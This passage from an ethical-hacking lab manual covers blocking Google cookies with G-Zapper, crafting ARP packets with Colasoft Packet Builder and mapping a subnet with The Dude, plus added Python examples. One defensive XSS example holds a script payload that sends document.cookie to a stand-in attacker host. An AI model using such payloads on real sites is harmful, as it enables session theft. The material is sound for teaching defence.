FIGURE 16.5: Block Google cookie. The warning reads: "Manually Blocking the Google Cookie. Gmail and other Google services will be unavailable while the cookie is manually blocked. If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically. Are you sure you wish to manually block the Google cookie? Yes / No"
6. It will show a message that the Google cookie has been blocked. Click OK.

The tiny tray icon runs in the background, takes up very little space and can notify you by sound and animation when the Google cookie is blocked.
FIGURE 16.6: Block Google cookie (2). The message reads: "The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify."
7. To test that the Google cookie has been blocked, click the Test Google button.

8. Your default web browser will now open Google's Preferences page. Click OK.
FIGURE 16.7: Cookies disabled message. Google's Preferences page warns: "Your cookies seem to be disabled. Setting preferences will not work until you enable cookies in your browser."
9. To view the deleted cookie information, click the Settings button, and click View Log under Cleaned Cookies Log.

G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for someone using your PC to get a glimpse of what you've been searching for.
FIGURE 16.8: Viewing the deleted logs. The G-Zapper Settings dialog has three groups: Sounds (Play sound effect when a cookie is deleted: default.wav, with Preview and Browse), Google Analytics Tracking (Block Google Analytics from tracking web sites that I visit), and Cleaned Cookies Log (Enable logging of cookies that have recently been cleaned; Save my Google ID in the cleaned cookies log; View Log; Clear Log).

You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy.
10. The deleted cookies information opens in Notepad (cookiescleaned):

(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 AM
(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies Friday, August 31, 2012 11:04:20 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Wednesday, September 05, 2012 02:52:38 PM

FIGURE 16.9: Deleted logs report
Lab Analysis

Document the Google cookies you detected, deleted, and blocked during the lab, and where each browser stored them.
Tool/Utility: G-Zapper

Information Collected/Objectives Achieved:

Action Performed:
■ Detect the cookies
■ Delete the cookies
■ Block the cookies

Result: the cleaned-cookies log records the cookie stores that were cleaned, under C:\Users\Administrator\Application Data (Firefox) and C:\Users\Administrator\AppData\Local (Chrome)
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine how G-Zapper automatically cleans Google cookies.

2. Check to see if G-Zapper is blocking cookies on sites other than Google.

Internet Connection Required

☑ Yes □ No

Platform Supported

☑ Classroom □ iLabs
Lab

Scanning the Network Using the Colasoft Packet Builder

The Colasoft Packet Builder is a useful tool for creating custom network packets.
Lab Scenario

In the previous lab you learned how you can detect, delete, and block cookies. Attackers exploit the XSS vulnerability, which involves an attacker pushing malicious JavaScript code into a web application. When another user visits a page with that malicious code in it, the user's browser will execute the code. The browser has no way of telling the difference between legitimate and malicious code. Injected code is another mechanism that an attacker can use for session hijacking: by default, cookies stored by the browser can be read by JavaScript code (unless they carry the HttpOnly flag). The injected code can read a user's cookies and transmit those cookies to the attacker.

As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields, encoding input and output and filtering metacharacters in the input, and using a web application firewall to block the execution of malicious script.

Another method of vulnerability checking is to scan a network using the Colasoft Packet Builder. In this lab, you will learn about sniffing network packets, performing ARP poisoning, spoofing the network, and DNS poisoning.
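The injection and cookie-theft mechanism described above, as a vulnerable handler beside a hardened one that applies the listed countermeasures (input validation, output encoding, and a session cookie that script cannot read), as an added example (not code from the lab manual). The handlers are plain functions returning headers and body so that no web framework is needed; the payload, the session value and the attacker host attacker.invalid are constructed for the example.

```python
"""Reflected XSS with cookie theft: a vulnerable search handler beside a
hardened one.

Added example (not code from the CEH lab manual). Handlers return a
(headers, body) pair instead of using a web framework. The payload,
session id and the host attacker.invalid are constructed for the demo.
"""
import html
import re

# Constructed attacker payload: exfiltrates document.cookie via an image request.
PAYLOAD = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"
QUERY_ALLOWED = re.compile(r"^[\w .,'-]{1,100}$")


def vulnerable_search(query: str, session_id: str):
    """Reflects the query unencoded; the session cookie is readable by any script."""
    headers = {"Set-Cookie": "sessionid=%s; Path=/" % session_id}
    body = "<h1>Results for %s</h1>" % query
    return headers, body


def validate_query(query: str) -> bool:
    """Input validation: allow-list the characters a search term may contain,
    which rejects the angle brackets and quotes a script injection needs."""
    return bool(QUERY_ALLOWED.match(query))


def render_results(query: str) -> str:
    """Output encoding: every reflected value passes through html.escape, so
    '<script>' reaches the browser as '&lt;script&gt;' text, not markup."""
    return "<h1>Results for %s</h1>" % html.escape(query, quote=True)


def hardened_search(query: str, session_id: str):
    """Validates, encodes, marks the cookie HttpOnly/Secure so document.cookie
    cannot read it, and sends a CSP that refuses inline script as a backstop."""
    headers = {
        "Set-Cookie": "sessionid=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % session_id,
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    if not validate_query(query):
        return headers, "<h1>Invalid search term</h1>"
    return headers, render_results(query)


def script_survives(body: str) -> bool:
    """Demo check: would the browser see a live <script> tag in this response?"""
    return "<script" in body.lower()


if __name__ == "__main__":
    print(vulnerable_search(PAYLOAD, "s3cr3t"))
    print(hardened_search(PAYLOAD, "s3cr3t"))
    print(render_results(PAYLOAD))
```

Each layer stands on its own: validation stops the payload at the door, encoding neutralises anything that slips past, HttpOnly keeps the session value out of document.cookie even if script does run, and the CSP blocks inline script altogether. A web application firewall, as the scenario mentions, adds a further filter in front of all of these.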
Lab Objectives

The objective of this lab is to reinforce concepts of network security policy, policy enforcement, and policy audits.
Lab Environment

In this lab, you need:

■ Colasoft Packet Builder, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A computer running Windows Server 2012 as host machine
■ Windows 8 running on a virtual machine as target machine
■ You can also download the latest version of Colasoft Packet Builder from the link http://www.colasoft.com/download/products/download_packet_builder.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ.
■ A web browser with Internet connection running in the host machine
Lab Duration

Time: 10 Minutes
Overview of Colasoft Packet Builder

Colasoft Packet Builder creates and sends custom network packets. This tool can be used to verify network protection against attacks and intruders. Colasoft Packet Builder features a decoding editor that allows users to edit specific protocol field values much more easily.

Users are also able to edit decoding information in two editors: Decode Editor and Hex Editor. Users can select any one of the provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet.
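The Ethernet, IP, ARP and TCP templates and the checksum recomputation described above, as an added example (not code from the lab manual or from Colasoft): it assembles an Ethernet/IPv4/TCP SYN frame and an ARP request byte by byte, computes the IP header checksum and the TCP pseudo-header checksum, and re-verifies them the way a decoder does. The source MAC and IP are the values the lab's adapter dialog shows (D4:BE:D9:C3:CE:2D, 10.0.0.7); the destination MAC 00:15:5D:00:07:01 and target 10.0.0.4 are assumed.

```python
"""Hand-building an Ethernet/IPv4/TCP SYN frame and an ARP request, with
the checksum recomputation the Packet Builder performs after a field edit.

Added example (not code from the CEH lab manual or from Colasoft). The
source MAC D4:BE:D9:C3:CE:2D and source IP 10.0.0.7 are the values the
lab's adapter dialog shows; the destination MAC and target 10.0.0.4 are
assumed. Only the bytes are produced; sending them needs a raw
(AF_PACKET/Npcap) socket or a tool such as the Packet Builder itself.
"""
import struct

SRC_MAC = "D4:BE:D9:C3:CE:2D"       # from the lab's adapter dialog
SRC_IP = "10.0.0.7"
DST_MAC = "00:15:5D:00:07:01"       # assumed for the example
DST_IP = "10.0.0.4"                 # assumed target


def inet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ethernet_header(dst_mac: str, src_mac: str, ethertype: int) -> bytes:
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ethertype)


def ipv4_header(src_ip: str, dst_ip: str, payload_len: int, proto: int = 6,
                ttl: int = 128, ident: int = 0x1234) -> bytes:
    """20-byte header, DF set; the checksum (bytes 10-11) covers the header only."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, 0x4000,
                      ttl, proto, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def tcp_header(src_ip: str, dst_ip: str, sport: int, dport: int, seq: int = 0,
               flags: int = 0x02, window: int = 8192, payload: bytes = b"") -> bytes:
    """20-byte header (no options). The checksum covers a pseudo-header of
    source/destination IP, zero, protocol 6 and TCP length, plus the segment."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, window, 0, 0)
    pseudo = ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(hdr) + len(payload))
    csum = inet_checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def build_tcp_syn(src_ip=SRC_IP, dst_ip=DST_IP, sport=40000, dport=80,
                  src_mac=SRC_MAC, dst_mac=DST_MAC) -> bytes:
    """Ethernet + IPv4 + TCP SYN, the frame a port-scan probe starts with."""
    tcp = tcp_header(src_ip, dst_ip, sport, dport)
    ip = ipv4_header(src_ip, dst_ip, len(tcp))
    return ethernet_header(dst_mac, src_mac, 0x0800) + ip + tcp


def build_arp_request(src_mac=SRC_MAC, src_ip=SRC_IP, target_ip=DST_IP) -> bytes:
    """Broadcast 'who has target_ip?' (the Packet Builder's ARP template)."""
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + mac_bytes(src_mac) + ip_bytes(src_ip)
           + b"\x00" * 6 + ip_bytes(target_ip))
    return ethernet_header("FF:FF:FF:FF:FF:FF", src_mac, 0x0806) + arp


def verify_ip_tcp(frame: bytes) -> dict:
    """Recheck both checksums the way a decoder does: summing a header that
    carries a correct checksum gives zero."""
    ihl = (frame[14] & 0x0F) * 4
    ip = frame[14:14 + ihl]
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = frame[14 + ihl:14 + total_len]
    pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, ip[9], len(tcp))
    return {"ip_ok": inet_checksum(ip) == 0,
            "tcp_ok": inet_checksum(pseudo + tcp) == 0,
            "length": len(frame)}


if __name__ == "__main__":
    frame = build_tcp_syn()
    print(frame.hex(), verify_ip_tcp(frame))
    print(build_arp_request().hex())
```

Editing a field in the Hex Editor without recomputing is exactly what verify_ip_tcp catches: changing the TCP flags byte leaves the IP checksum valid but invalidates the TCP one, which is why the Packet Builder exposes a Checksum button.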
Lab Tasks
1. Install and launch the Colasoft Packet Builder.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.
TASK 1: Scanning Network
FIGURE 17.1: Windows Server 2012 - Desktop view
3. Click the Colasoft Packet Builder 1.0 app to open the Colasoft Packet Builder window.
You can download Colasoft Packet Builder from http://www.colasoft.com.
FIGURE 17.2: Windows Server 2012 - Apps
4. The Colasoft Packet Builder main window appears.
FIGURE 17.3: Colasoft Packet Builder main screen
5. Before starting your task, check that the Adapter settings are set to default and then click OK.
Operating system requirements: Windows Server 2003 and 64-bit Edition; Windows 2008 and 64-bit Edition; Windows 7 and 64-bit Edition.
Select Adapter dialog: Physical Address D4:BE:D9:C3:CE:2D, Link Speed 100.0 Mbps, Max Frame Size 1500 bytes, IP Address 10.0.0.7/255.255.255.0, Default Gateway 10.0.0.1, Adapter Status Operational.
FIGURE 17.4: Colasoft Packet Builder Adapter settings
6. To add or create the packet, click Add in the menu section.
FIGURE 17.5: Colasoft Packet Builder creating the packet
7. When an Add Packet dialog box pops up, you need to select the template and click OK.
Add Packet dialog: Select Template: ARP Packet; Delta Time: 0.1 Second.
There are two ways to create a packet: Add and Insert. The difference between these is the newly added packet's position in the Packet List. The new packet is listed as the last packet in the list if added, but after the current packet if inserted.
Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and *.cpf (Capsa 4.0 Packet File) formats. You may also import data from *.cap (Network Associates Sniffer packet files), *.pkt (EtherPeek v7 / TokenPeek / AiroPeek v9 / OmniPeek v9 packet files), *.dmp (TCPDUMP), and *.rawpkt (raw packet files).
FIGURE 17.6: Colasoft Packet Builder Add Packet dialog box
8. You can view the added packets list on the right-hand side of your window.
TASK 2: Decode Editor
9. Colasoft Packet Builder allows you to edit the decoding information in the two editors: Decode Editor and Hex Editor.
Packet List (Packets: 1, Selected: 1): No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00
FIGURE 17.7: Colasoft Packet Builder Packet List
Decode Editor - Packet: Num:000001 Length:64
  Ethernet Type II [0/14]
    Destination Address: FF:FF:FF:FF:FF:FF [0/6]
    Source Address: 00:00:00:00:00:00 [6/6]
    Protocol: 0x0806 (ARP) [12/2]
  ARP - Address Resolution Protocol [14/28]
    Hardware Type: 1 (Ethernet)
    Protocol Type: 0x0800 [16/2]
    Hardware Address Length: 6 [18/1]
    Protocol Address Length: 4 [19/1]
    Type: 1 (ARP Request)
    Source Physical: 00:00:00:00:00:00 [22/6]
    Source IP: 0.0.0.0 [28/4]
    Destination Physical: 00:00:00:00:00:00 [32/6]
    Destination IP: 0.0.0.0 [38/4]
  Extra Data: 18 bytes [42/18]
  FCS: 0xF577BDD9
Burst Mode Option: If you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option.
FIGURE 17.8: Colasoft Packet Builder Decode Editor
Hex Editor - Total 60 bytes
0000  FF FF FF FF FF FF 00 00 00 00 00 00 08 06
000E  00 01 08 00 06 04 00 01 00 00 00 00 00 00
001C  00 00 00 00 00 00 00 00 00 00 00 00 00 00
002A  00 00 00 00 00 00 00 00 00 00 00 00 00 00
0038  00 00 00 00
FIGURE 17.9: Colasoft Packet Builder Hex Editor
10. To send all packets at one time, click Send All from the menu bar.
11. Check the Burst Mode option in the Send All Packets dialog window, and then click Start.
Option, Loop Sending: This defines the repeated times of the sending execution, one time by default. Please enter zero if you want to keep sending packets until you pause or stop it manually.
FIGURE 17.10: Colasoft Packet Builder Send All button
Select a packet from the packet listing to activate the Send All button.
FIGURE 17.11: Colasoft Packet Builder Send All Packets
12. Click Start.
Send All Packets dialog: Adapter: Realtek PCIe GBE Family Controller; Burst Mode (no delay between packets); Loop Sending: 1 loops (zero for infinite loop); Delay Between Loops: 1000 milliseconds; Sending Information: Total Packets 1, Packets Sent 1.
The progress bar presents an overview of the sending process you are engaged in at the moment.
FIGURE 17.12: Colasoft Packet Builder Send All Packets
13. To export the packets sent from the File menu, select File -> Export -> All Packets.
FIGURE 17.13: Export All Packets option
FIGURE 17.14: Select a location to save the exported file
FIGURE 17.15: Colasoft Packet Builder exporting packet (Packets.cscpkt)
Lab Analysis
Analyze and document the results related to the lab exercise.
Tool/Utility                Information Collected/Objectives Achieved
Colasoft Packet Builder     Adapter Used: Realtek PCIe Family Controller
                            Selected Packet Name: ARP Packets
                            Result: Captured packets are saved in packets.cscpkt
Option, Packets Sent: This shows the number of packets sent successfully. Colasoft Packet Builder displays the packets sent unsuccessfully, too, if there is a packet not sent out.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network.
2. Evaluate what types of instant messages Capsa monitors.
3. Determine whether the packet buffer affects performance. If yes, then what steps do you take to avoid or reduce its effect on software?
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Lab
Scanning Devices in a Network Using The Dude
The Dude automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.
Lab Scenario
In the previous lab you learned how packets can be captured using Colasoft Packet Builder. Attackers too can sniff, capture, and analyze packets from a network and obtain specific network information. The attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network.
As an expert ethical hacker, you should be able to gather information on an organization's network to check for vulnerabilities and fix them before an attacker gets to compromise the machines using those vulnerabilities. If you detect any attack that has been performed on a network, immediately implement preventative measures to stop any additional unauthorized access.
In this lab you will learn to use The Dude tool to scan the devices in a network, and the tool will alert you if any attack has been performed on the network.
Lab Objectives
The objective of this lab is to demonstrate how to scan all devices within specified subnets, draw and lay out a map of your networks, and monitor services on the network.
Lab Environment
To carry out the lab, you need:
■ The Dude is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\The Dude
■ You can also download the latest version of The Dude from http://www.mikrotik.com/thedude.php
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click The Dude and follow the wizard-driven installation steps to install The Dude
■ Administrative privileges to run tools
Lab Duration
Time: 10 Minutes
Overview of The Dude
The Dude network monitor is a new application that can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and lay out a map of your networks, monitor services of your devices, and alert you in case some service has problems.
Lab Tasks
1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.
FIGURE 18.1: Windows Server 2012 - Desktop view
2. In the Start menu, to launch The Dude, click The Dude icon.
TASK 1: Launch The Dude
FIGURE 18.2: Windows Server 2012 - Start menu
3. The main window of The Dude will appear.
FIGURE 18.3: Main window of The Dude
4. Click the Discover button on the toolbar of the main window.
FIGURE 18.4: Select discover button
5. The Device Discovery window appears.
Device Discovery window (General tab): Scan Networks: 10.0.0.0/24 (enter the subnet number you want to scan for devices); Agent; Add Networks To Auto Scan; Black List; Device Name Preference: DNS, SNMP, NETBIOS, IP; Discovery Mode: fast (scan by ping) or reliable (scan each service); Recursive Hops; Layout Map After Discovery Complete.
FIGURE 18.6: Device discovery window
6. In the Device Discovery window, specify the Scan Networks range, select default from the Agent drop-down list, select DNS, SNMP, NETBIOS, and IP from the Device Name Preference drop-down list, and click Discover.
Device Discovery settings used: Scan Networks: 10.0.0.0/24; Agent: default; Black List: none; Device Name Preference: DNS, SNMP, NETBIOS, IP; Discovery Mode: fast (scan by ping); Recursive Hops: 1.
FIGURE 18.7: Selecting device name preference
7. Once the scan is complete, all the devices connected to a particular network will be displayed.
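To make the Device Discovery settings concrete, here is an added Python model (not The Dude's own code) of what the form in steps 5 and 6 asks for: the Scan Networks range minus the Black List, the fast (ping) versus reliable (each service) discovery mode, and the Device Name Preference fallback order. The probe table is constructed for the example; treating a host as found in reliable mode when any probed service answered is an assumption about the tool's behaviour.

```python
import ipaddress

# Constructed probe results for four addresses in the lab's 10.0.0.0/24 range,
# standing in for what the discovery agent learns per address. None/False means
# the probe got no answer. These are not real results from The Dude.
PROBES = {
    "10.0.0.1": {"ping": True, "dns": "gw.lab.local", "snmp": "RouterOS", "netbios": None},
    "10.0.0.7": {"ping": True, "dns": None, "snmp": None, "netbios": "WIN-LAB01"},
    "10.0.0.12": {"ping": False, "dns": None, "snmp": None, "netbios": None},
    "10.0.0.200": {"ping": False, "dns": None, "snmp": "printer", "netbios": None},
}
DEFAULT_PREFERENCE = ("DNS", "SNMP", "NETBIOS", "IP")  # the lab's Device Name Preference

def scan_addresses(networks, black_list=()):
    """Every address covered by 'Scan Networks' that is not covered by the Black List."""
    excluded = [ipaddress.ip_network(b, strict=False) for b in black_list]
    out = []
    for net in networks:
        for ip in ipaddress.ip_network(net, strict=False):
            if not any(ip in x for x in excluded):
                out.append(str(ip))
    return out

def device_name(ip, probe, preference=DEFAULT_PREFERENCE):
    """First name source in the preference order that answered; IP is the final fallback."""
    for source in preference:
        if source == "IP":
            return ip
        if probe.get(source.lower()):
            return probe[source.lower()]
    return ip

def is_alive(probe, mode):
    """fast = scan by ping only; reliable = host counts if any probed service answered (assumed)."""
    if mode == "fast":
        return bool(probe.get("ping"))
    if mode == "reliable":
        return any(probe.values())
    raise ValueError(f"unknown discovery mode: {mode}")

def discover(networks, probes, mode="fast", black_list=(), preference=DEFAULT_PREFERENCE):
    """Map address -> display name for hosts found, mirroring the Device Discovery form."""
    found = {}
    for ip in scan_addresses(networks, black_list):
        probe = probes.get(ip)
        if probe and is_alive(probe, mode):
            found[ip] = device_name(ip, probe, preference)
    return found
```

Note that 10.0.0.0/24 covers 256 addresses (10.0.0.0 through 10.0.0.255), and that a host blocking ICMP but answering SNMP only shows up in reliable mode.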
FIGURE 18.8: Overview of network connection
8. Select a device and place the mouse cursor on it to display the detailed information about that device.
FIGURE 18.9: Detailed information of the device
9. Now, click the down arrow for the Local drop-down list to see information on History Actions, Tools, Files, Logs, and so on.
FIGURE 18.10: Selecting Local information
10. Select options from the drop-down list to view complete information.
FIGURE 18.11: Scanned network complete information
11. As described previously, you may select all the other options from the drop-down list to view the respective information.
12. Once scanning is complete, click the button to disconnect.
FIGURE 18.12: Connection of systems in network
Lab Analysis
Analyze and document the results related to the lab exercise.
Tool/Utility    Information Collected/Objectives Achieved
The Dude        IP Address Range: 10.0.0.0 - 10.0.0.24
                Device Name Preferences: DNS, SNMP, NETBIOS, IP
                Output: List of connected systems and devices in the network
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs